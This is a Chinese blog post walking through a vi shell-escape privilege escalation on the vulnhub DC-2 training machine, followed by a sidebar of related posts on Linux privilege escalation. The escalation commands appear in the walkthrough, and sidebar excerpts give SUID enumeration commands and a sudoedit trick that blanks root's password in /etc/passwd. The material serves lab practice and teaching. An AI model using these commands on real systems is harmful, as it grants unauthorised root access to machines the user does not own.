vi-提权

已于 2024-09-23 21:21:11 修改
阅读量685 收藏 12
点赞数 8
分类专栏: 网络安全 文章标签: linux 权限提升
于 2024-01-19 18:57:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longwanlian/article/details/135705109
版权

环境布置 ——vulnhub-dc2

compgen -c       //查看可以使用的指令

image-20240119155752801

发现可以使用vi命令,此命令存在提权(本质上属于sudo提权)

先查看提示

vi flag3.txt

image-20240119155933240

先提权然后查看jerry账号

操作步骤

vi随便打开文件
输入:
再下面添加
:set shell=/bin/sh
:shell

image-20240119164803845

按回车,再次输入:

image-20240119164829571

image-20240119164842649

图片转存中…(img-HUjOTdne-1705661798066)]

此时以及提升了权限,具体能提升多少,看操作环境

longersking
关注
专栏目录
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
Linux怎么对当前目录提权,linux提权方法(不断总结更新)
weixin_28331555的博客
04-29 782
1.suid提权运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)搜索符合条件的可以用来提权的:find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;find / -user root -perm -4000 -print 2>/dev...
VIM 通过 Server-Client 模式提权
0pr
06-05 390
背景 近期创建了一种新的工作流,就是使用 VIM 的 Server-Client 模式。在这个模式下,所有打开的文件会被发送到同一个 VIM 窗口。这样的好处很明显,如果有多个窗口在编辑文件,就需要到处切换,找想要的文件,现在不用到处找了,都汇总在一起。我会使用 --remote-tab 在新的 vim tab 中加载新文件,这样非常直观,方便管理。 但是有一个问题,就是非 root 用户运行的 vim server,是不能编辑系统文件的(也就是所属用户是 root)。解决方法是,要使用 sudo 来运行
DC-2(VI GIT提权)
E1even的博客
08-25 933
文章目录扫描网段内存活主机及其开放端口FLAG1:访问即可FLAG2:使用工具爆破用户密码FLAG3:SSH登录并绕过rbash限制FLAG4:VI提权FLAG5:GIT提权 kali攻击????:192.168.78.131 目标主机:192.168.78.xxx 环境配置参照DC-1 扫描网段内存活主机及其开放端口 使用命令查询主机所在网段 ifconfig 得到网段192.168.78.xxx,扫描该网段内其他存活的主机 nmap -sP 192.168.78.0/24 发现192.168.
HTB_Vaccine之通过root权限vi提权
网络安全学习
08-30 1267
zip解密 sqlmap获取os-shell root vi提权
linux利用* vim提权,linux 通过suid vim.basic文件提权
weixin_33289873的博客
05-14 216
在kali上复现先给需要的vim.basic文件设置suid权限chmod u+s /usr/bin/vim.basic先adduser test1一个普通权限用户现在就是一个合适的提权环境通过以下命令可以找到存在suid权限的文件find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/d...
权限提升和维持
FisrtBqy的博客
03-30 1456
渗透测试中常见的权限提升和维持手段
Linux_权限管理-su-切换用户_sudo-提权
qq_31455841的博客
11-26 892
Linux_权限管理-su_sudo su-切换用户 sudo-提权 1. su sudo介绍 # su switch user Change the effective user id and group id to that of USER # sudo switch user, do execute a command as another user # su和sudo出现的缘由 因为root用户的权限太大,破坏力太强,安全风险极高,所以通常情况下公司的服务器对外都是禁止root
linux提权-SUID提权
qq_40510246的博客
07-15 1026
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的文件列表如下: Nmap Vim find Bash More Less Nano cp 以下命令可以发现系统上运行的所有SUID可执行文件。 find / -u...
hackthebox-swagshop(考点:magento安全 & vi提权)
冬萍子癸水
04-11 572
nmap 打开80,这是个网站,搜一下可以看到登录框。既然有magento的logo。不妨先查下什么是mangento 既然是个著名的电商系统,可以搜一下漏洞 有很多,因为py方便,就选择py,且37977.py前面似乎没写版本要求,可能这个更通用些,就试这个 打开看看,做点修改,把网址改成靶机的网址 运行,报错,根据报错提示,我直接把非code部分都删了 再运行,搞定,生成一个管理员账户 ...
Linux提权
热门推荐
m0_57856283的博客
03-12 1万+
将这个虚拟文件导入虚拟机 开机默认没密码 账号:Bob 密码:secret root账号密码secret123 进去之后是这样的 我们先查看他的ip地址 这里我们看到他是没有IP地址的 我们先切换到root账户 进来之后需要改一个配置文件 然后我们看到了它已经获取到了ip 然后我们打开kali远程到被害机,注意,我们用普通用户远程过去 ssh bob@192.168.179.138 我们可以看到他已经远程了过来 过来之后我们可以先·看看他是什...
su And sudo提权
weixin_33743703的博客
04-06 118
1.su与sudo命令详解命令:su功能:切换用户语法:su [选项]... [-] [USER [ARG]...]选项:-, -l, --login:切换至目标用户,其用户权限,环境变量都会随之切换至目标用户;若无此选项,则只有用户的权限切换至目标用户-c, --command=COMMAND:以指定用户的身份执行一次命令,就立即退出-m, --preserve-envir...
DC-2靶机渗透测试(cewl,wpscan,hydra爆破,rbash逃逸,vi提权,git提权
single_g_l的博客
03-17 3089
目录 一. 环境 二. 信息收集(识别目标主机,端口,拿到flag1) 01. 主机发现 02.访问地址192.168.1.8:80 03. 注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件 04. 配置hosts文件,再次访问,拿到flag1 ​三. wpscan枚举,cwel生成字典,爆破获取密码,登录用户,拿到flag2 01. 使用cewl生成密码 02. 确定是wordpress,使用wpscan工具扫描,枚举出了用户 03. wpscan爆破拿到..
常用Linux提权(非漏洞)
Thegentlest的博客
08-31 4794
编译如下文件并添加SUID权限,在普通用户下执行该文件即可获得root的shell。}Note:上述SUID提权只是一部分并不全面,如需更多SUID提权详细信息可以参考如下链接GTFOBins。二、sudo命令提权当sudoers文件中某些用户包含某些命令的sudo权限时,可能导致提权问题发生。sudo -l查看当前用户有哪些sudo权限1.git执行!/bin/bash可以直接提权成功,less、man同理。...
Linux提权——SUDO
negnegil的博客
09-03 9289
使用Sudo权限提升Linux账户权限Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。如下图 Sudoer文件语法 假如我们(root用户)要给普通用户test分配sudo权限,请输出vim /etc/sudoers打开文件进行编辑,找到root权限root ALL=(ALL:ALL) ALL,在下一行输入 test ALL(ALL:ALL) ALL,保存后退出,这样即表示用户test可以使用sudo调用root权
Linux提权————Linux下三种不同方式的提权技巧
Fly_鹏程万里
05-16 4095
在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到获取到低权限SHELL后我们通常做下面几件事1.检测操作系统的发...
Linux提权大全
yggcwhat
05-14 9542
Linux提权大全
linux笔记之 vi编辑器和用户的配置文件及提权
Key_book(句芒安全实验室)
05-03 1427
vi编辑器3种模式, 命令模式 dd 删除整行 yy 复制整行 p 粘贴 x 删除光标所处的字符 插入模式 a 在光标后插入 i 在光标前 o 换行输入 末行模式 : 切换到末行模式 :set nu 显示行号 :set nonu 不显示行号 用户信息存放位置 /etc/passwd 用户和群组密码存放位置 /etc/shadow 在centos6 中普通用...
Linix提权(一)
qq_40327508的博客
09-23 1416
SUID 提权 什么是suid?suid全称是Set owner User ID up on execution。这是Linux给可执行文件的一个属性。通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。需要注意的是,只有程序的所有者是0号或其他super user,同时拥有suid权限,才可以提权。 常见的可用来提权Linux 可执行文件有: Nmap, Vim, find, bash, more, less, nano, cp 查看可以suid 提权的可执行文件 find / -pe
sudoedit 提权复现
最新发布
05-14
sudoedit 是 Linux 系统中一个常用的命令,它可以让普通用户在拥有 sudo 权限的情况下编辑指定的文件。sudoedit 命令的实现方式是通过使用系统的默认编辑器(通常是 vi 或 nano)以 root 用户身份打开指定文件,普通用户可以在编辑器中进行修改,修改完成后保存并退出,系统会将修改后的文件保存到指定的位置。 sudoedit 命令的使用需要用户拥有 sudo 权限,并且需要指定要编辑的文件。在没有指定文件的情况下,sudoedit 会打开一个空白文件并等待用户输入内容。如果用户没有 sudo 权限,则无法使用 sudoedit 命令进行文件编辑。 要进行 sudoedit 的提权复现,需要先找到一个拥有 sudoedit 权限的用户账号。在终端中输入以下命令: ``` sudoedit /etc/passwd ``` 此时系统会提示输入当前用户的密码,输入正确的密码后,系统会使用默认编辑器以 root 用户身份打开 /etc/passwd 文件,并等待用户进行修改。在编辑器中输入以下内容: ``` root::0:0:root:/root:/bin/bash ``` 这条命令的含义是将 root 用户的密码字段清空,也就是将其修改为无密码状态。保存并退出编辑器后,系统会将修改后的文件保存到 /etc/passwd 文件中。 此时,我们可以使用 su 命令尝试以 root 用户身份登录系统: ``` su ``` 此时系统会提示输入 root 用户的密码,但是由于我们已经将其修改为无密码状态,直接按下回车键即可成功登录系统,获得 root 权限。 需要注意的是,这种提权方式只适用于拥有 sudoedit 权限的用户,如果没有这个权限,无法使用 sudoedit 命令进行文件编辑。另外,这种提权方式也存在一定的风险,因为修改 /etc/passwd 文件可能会导致系统出现异常,建议只在测试环境中进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值